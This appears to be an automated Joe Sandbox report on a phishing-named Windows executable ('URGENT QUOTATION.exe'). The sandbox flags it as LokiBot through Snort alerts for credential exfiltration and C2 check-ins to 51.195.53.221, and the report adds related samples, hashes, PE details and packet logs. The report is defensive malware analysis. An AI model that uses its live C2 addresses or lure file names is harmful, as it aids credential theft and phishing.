                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 52.113.196.254, 51.104.139.180, 13.107.3.254, 40.88.32.150, 104.42.151.234, 104.43.193.48, 184.30.21.144, 52.147.198.201, 13.64.90.137, 13.107.42.13, 13.107.42.12, 168.61.161.212, 8.248.115.254, 8.248.135.254, 8.253.207.121, 8.248.147.254, 8.248.139.254, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247
                  • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.l-msedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, odc-by-files-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, odc-by-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, s-ring.s-9999.s-msedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, odc-by-files-geo.onedrive.akadns.net, teams-ring.msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  19:55:27API Interceptor3x Sleep call for process: URGENT QUOTATION.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  51.195.53.221Payment Advice.PDF.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/UXzOJYiOV7I83
                  PO#735086_pdf.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/TABGAUKhpT2hu
                  Fk2R8VvodKESjNz.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/kdPYBLiWHt5e8
                  bwNz5CvLWA.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/lJ606117cGKwY
                  Original Invoice.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/9jOsfsOpZTcJM
                  Shipping Details_PDF.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/7gEWZ4upg1lkl
                  ar31Dwi59D2H6pJ.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/2dY9AG7m0LNWP
                  SecuriteInfo.com.CAP_HookExKeylogger.25342.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/lJ606117cGKwY
                  HSBC Payment.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/fA33po5ZHfzav
                  Offer to Purchase.xlsxGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/lJ606117cGKwY
                  Offerte aanvragen#U00b7pdf.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/BXlnnQj8OAckh
                  Shipping Details_PDF.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/7gEWZ4upg1lkl
                  Original Invoice.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/NyO3EiWYgxXgy
                  Dokumen BPN [030951966215000AUTOMATION24971775911039.PDF.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/UXzOJYiOV7I83
                  XiBlptMzvr.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/lJ606117cGKwY
                  Purchase Order RFQ-HL51L07.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/cfOoZYb0LXPms
                  DHL.doc.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/2dY9AG7m0LNWP
                  Letter(gift) Supplier_2021.pdf.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/UXzOJYiOV7I83
                  DHL BILL OF LADING DOC.gz.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/dUQz9bwGRLNK7
                  DHL_AWB 9804583234_pdf.exeGet hashmaliciousBrowse
                  • 51.195.53.221/p.php/TABGAUKhpT2hu

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  OVHFRSubconract 504.xlsmGet hashmaliciousBrowse
                  • 37.187.115.122
                  87BB0T225KLOI88U44D000DS2F4H414DD.vbsGet hashmaliciousBrowse
                  • 144.217.17.185
                  leaseplan-invoice-831008_xls2.HtMlGet hashmaliciousBrowse
                  • 146.59.152.166
                  (G0170-PF3F-20-0260)2T.exeGet hashmaliciousBrowse
                  • 188.165.242.45
                  Booking Confirmation 02222021951 - copy -PDF.exeGet hashmaliciousBrowse
                  • 87.98.245.48
                  SecuriteInfo.com.Exploit.Siggen3.10343.28053.xlsGet hashmaliciousBrowse
                  • 198.50.187.46
                  SecuriteInfo.com.Exploit.Siggen3.10343.28053.xlsGet hashmaliciousBrowse
                  • 198.50.187.46
                  Complaint_Letter_1212735678-02192021.xlsGet hashmaliciousBrowse
                  • 87.98.239.40
                  Complaint_Letter_1212735678-02192021.xlsGet hashmaliciousBrowse
                  • 87.98.239.40
                  Payment Advice.PDF.exeGet hashmaliciousBrowse
                  • 51.195.53.221
                  DHL Shipment Notification 7465649870,pdf.exeGet hashmaliciousBrowse
                  • 142.44.136.34
                  PO#735086_pdf.exeGet hashmaliciousBrowse
                  • 51.195.53.221
                  Covid 19 bilgi y#U00f6netim sistemi.msiGet hashmaliciousBrowse
                  • 51.77.118.172
                  ce-equinix_1.0.1.apkGet hashmaliciousBrowse
                  • 5.135.83.77
                  KUmKV28Ffx.exeGet hashmaliciousBrowse
                  • 66.70.204.222
                  c4p1vG05Z8.exeGet hashmaliciousBrowse
                  • 51.89.123.225
                  KLunCDGm5W.exeGet hashmaliciousBrowse
                  • 167.114.145.33
                  Fk2R8VvodKESjNz.exeGet hashmaliciousBrowse
                  • 51.195.53.221
                  bwNz5CvLWA.exeGet hashmaliciousBrowse
                  • 51.195.53.221
                  Original Invoice.exeGet hashmaliciousBrowse
                  • 51.195.53.221

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                  Process:C:\Users\user\Desktop\URGENT QUOTATION.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                  Process:C:\Users\user\Desktop\URGENT QUOTATION.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):966
                  Entropy (8bit):0.6249317112532295
                  Encrypted:false
                  SSDEEP:3:/lbel/lllbel/lllbel/lllbel/lllbel/lllbel/lllbel/lllbel/lllbel/lh:4/g/g/g/g/g/g/g/g/g/g
                  MD5:66C8E69AD8C2DC9BA8D6C3D08861DCDA
                  SHA1:2343A74E50E837B6EDF8DE852BA32C6A2CFD820C
                  SHA-256:08A7F0B78A47D3D7FB5383E527F5318E5C498D610225CC25C19A487C4CC27BCB
                  SHA-512:E3143A110D10154EF7AB81C66D5A5DDB0EA2EB0C11E4FC2C919EF4B06E7E8BA4ACEEEB4653023C73327DD907F8E90C47DD8209305BF0678D022652CACB08735E
                  Malicious:false
                  Reputation:low
                  Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.35081517066537
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.15%
                  • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:URGENT QUOTATION.exe
                  File size:135168
                  MD5:b49c71be94624173a9683580c792b195
                  SHA1:4b78a8199129007580b91060db70ce44fe7278e5
                  SHA256:8cf8f18fb85f0e190ff77fd57264cf9e31dd7128f1b4ad43713e128a6d68e867
                  SHA512:4ef927a36965dca57cd852d50c987ca1b35cfee8487c2140c1f05611a5684ef32f1557eebf72fc54fa05589c6dce3c59de724240857a62e57ba9c996d4fb6999
                  SSDEEP:1536:1cOz3NIR0xDg48LNL6RURm5TwtLXpaRCj5rEoUR:RZI0xQKUR/LXpaY1U
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......bc..&..H&..H&..H...H'..Hi .H...H.$.H'..HRich&..H................PE..L....I.H..........................................@........

                  File Icon

                  Icon Hash:0c695b5f13133b30

                  Static PE Info

                  General

                  Entrypoint:0x4015d8
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x48AD4985 [Thu Aug 21 10:55:01 2008 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:cf1699b617228992f3df7f1484e33d33

                  Entrypoint Preview

                  Instruction
                  push 00402760h
                  call 00007F270CC7A1E3h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor byte ptr [eax], al
                  add byte ptr [eax], al
                  cmp byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  mov al, D5h
                  fcomp qword ptr [esi+eax*8]
                  cmp dh, 00000040h
                  mov cl, A7h
                  sub esi, esp
                  test al, A7h
                  lds ebp, eax
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add dword ptr [eax], eax
                  add byte ptr [eax], al
                  popad
                  jo 00007F270CC7A266h
                  imul ebp, dword ptr [edi+6Eh], 70726F43h
                  outsd
                  jc 00007F270CC7A253h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add bh, bh
                  int3
                  xor dword ptr [eax], eax
                  or byte ptr [edi-5Ch], al
                  cld
                  jl 00007F270CC7A176h
                  aaa
                  jnp 00007F270CC7A23Dh
                  adc edx, 0ACEE40Ah
                  add cl, dh
                  push edi
                  lea ecx, dword ptr [ebp-41h]
                  jnp 00007F270CC7A225h
                  add al, 4Fh
                  mov eax, dword ptr [BA6B9014h]
                  mov ch, 06h
                  bound edi, dword ptr [edx]
                  dec edi
                  lodsd
                  xor ebx, dword ptr [ecx-48EE309Ah]
                  or al, 00h
                  stosb
                  add byte ptr [eax-2Dh], ah
                  xchg eax, ebx
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  cmpsd
                  adc byte ptr [eax], al
                  add byte ptr [0000000Fh], bl
                  push cs
                  add byte ptr [eax+65h], cl
                  insb
                  push 73736465h
                  imul ebp, dword ptr [edi+6Ch], 65h
                  outsb
                  add byte ptr [53000B01h], cl
                  je 00007F270CC7A253h
                  je 00007F270CC7A257h
                  arpl word ptr [edx+61h], si

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1d3b40x28.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x1288.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x128.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x1c8680x1d000False0.37255859375data5.68638281938IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .data0x1e0000x1c8200x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc0x3b0000x12880x2000False0.26904296875data3.06652205631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x3b3e00xea8data
                  RT_GROUP_ICON0x3b3cc0x14data
                  RT_VERSION0x3b0f00x2dcdataEnglishUnited States

                  Imports

                  DLLImport
                  MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                  Version Infos

                  DescriptionData
                  Translation0x0409 0x04b0
                  LegalCopyrightMisterBreak
                  InternalNameconstantinsborg
                  FileVersion1.00
                  CompanyNameMisterBreak
                  LegalTrademarksMisterBreak
                  CommentsMisterBreak
                  ProductNameCorpora
                  ProductVersion1.00
                  OriginalFilenameconstantinsborg.exe

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  02/22/21-19:55:26.030114TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974380192.168.2.451.195.53.221
                  02/22/21-19:55:26.030114TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.451.195.53.221
                  02/22/21-19:55:26.030114TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.451.195.53.221
                  02/22/21-19:55:26.030114TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974380192.168.2.451.195.53.221
                  02/22/21-19:55:26.532301TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974480192.168.2.451.195.53.221
                  02/22/21-19:55:26.532301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.451.195.53.221
                  02/22/21-19:55:26.532301TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.451.195.53.221
                  02/22/21-19:55:26.532301TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974480192.168.2.451.195.53.221
                  02/22/21-19:55:26.968569TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.451.195.53.221
                  02/22/21-19:55:26.968569TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.451.195.53.221
                  02/22/21-19:55:26.968569TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.451.195.53.221
                  02/22/21-19:55:26.968569TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.451.195.53.221
                  02/22/21-19:55:27.547797TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.451.195.53.221
                  02/22/21-19:55:27.547797TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.451.195.53.221
                  02/22/21-19:55:27.547797TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.451.195.53.221
                  02/22/21-19:55:27.547797TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.451.195.53.221
                  02/22/21-19:55:28.064710TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.451.195.53.221
                  02/22/21-19:55:28.064710TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.451.195.53.221
                  02/22/21-19:55:28.064710TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.451.195.53.221
                  02/22/21-19:55:28.064710TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.451.195.53.221
                  02/22/21-19:55:28.625081TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.451.195.53.221
                  02/22/21-19:55:28.625081TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.451.195.53.221
                  02/22/21-19:55:28.625081TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.451.195.53.221
                  02/22/21-19:55:28.625081TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.451.195.53.221
                  02/22/21-19:55:54.056209ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 22, 2021 19:55:25.982815981 CET4974380192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.025729895 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.025830984 CET4974380192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.030113935 CET4974380192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.072932959 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.073054075 CET4974380192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.115890980 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.303994894 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.304028034 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.304047108 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.304064035 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.304080009 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.304097891 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.304114103 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.304119110 CET4974380192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.304131985 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.304150105 CET804974351.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.304177999 CET4974380192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.304200888 CET4974380192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.304256916 CET4974380192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.486068964 CET4974480192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.528930902 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.529052973 CET4974480192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.532300949 CET4974480192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.575352907 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.575452089 CET4974480192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.618608952 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.814730883 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.814758062 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.814770937 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.814786911 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.814804077 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.814821005 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.814836979 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.814857006 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.814876080 CET804974451.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.814933062 CET4974480192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.815023899 CET4974480192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.816253901 CET4974480192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.920228004 CET4974580192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.963185072 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:26.963323116 CET4974580192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:26.968569040 CET4974580192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.013710022 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.013936996 CET4974580192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.056998014 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.275238037 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.275314093 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.275357962 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.275397062 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.275435925 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.275448084 CET4974580192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.275479078 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.275517941 CET4974580192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.275520086 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.275552034 CET4974580192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.275563955 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.275614977 CET4974580192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.275707960 CET804974551.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.277110100 CET4974580192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.496277094 CET4974880192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.539612055 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.541325092 CET4974880192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.547796965 CET4974880192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.593133926 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.593444109 CET4974880192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.638089895 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.841558933 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.841588020 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.841613054 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.841635942 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.841655970 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.841677904 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.841698885 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.841717958 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.841751099 CET4974880192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.841778040 CET4974880192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.841804028 CET4974880192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.843343973 CET4974880192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:27.845871925 CET804974851.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:27.845964909 CET4974880192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:28.011992931 CET4974980192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:28.058187962 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.058304071 CET4974980192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:28.064709902 CET4974980192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:28.107681990 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.107758999 CET4974980192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:28.153806925 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.371942997 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.371972084 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.371992111 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.372010946 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.372025967 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.372042894 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.372057915 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.372075081 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.372090101 CET804974951.195.53.221192.168.2.4
                  Feb 22, 2021 19:55:28.372155905 CET4974980192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:28.372230053 CET4974980192.168.2.451.195.53.221
                  Feb 22, 2021 19:55:28.373610973 CET4974980192.168.2.451.195.53.221

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 22, 2021 19:54:51.186764002 CET6524853192.168.2.48.8.8.8
                  Feb 22, 2021 19:54:51.235390902 CET53652488.8.8.8192.168.2.4
                  Feb 22, 2021 19:54:51.295857906 CET5372353192.168.2.48.8.8.8
                  Feb 22, 2021 19:54:51.344655037 CET53537238.8.8.8192.168.2.4
                  Feb 22, 2021 19:54:51.574980974 CET6464653192.168.2.48.8.8.8
                  Feb 22, 2021 19:54:51.634310007 CET53646468.8.8.8192.168.2.4
                  Feb 22, 2021 19:54:53.045952082 CET6529853192.168.2.48.8.8.8
                  Feb 22, 2021 19:54:53.094594002 CET53652988.8.8.8192.168.2.4
                  Feb 22, 2021 19:54:53.826469898 CET5912353192.168.2.48.8.8.8
                  Feb 22, 2021 19:54:53.876986027 CET53591238.8.8.8192.168.2.4
                  Feb 22, 2021 19:54:55.059550047 CET5453153192.168.2.48.8.8.8
                  Feb 22, 2021 19:54:55.112478971 CET53545318.8.8.8192.168.2.4
                  Feb 22, 2021 19:54:55.857968092 CET4971453192.168.2.48.8.8.8
                  Feb 22, 2021 19:54:55.906671047 CET53497148.8.8.8192.168.2.4
                  Feb 22, 2021 19:54:56.128969908 CET5802853192.168.2.48.8.8.8
                  Feb 22, 2021 19:54:56.192874908 CET53580288.8.8.8192.168.2.4
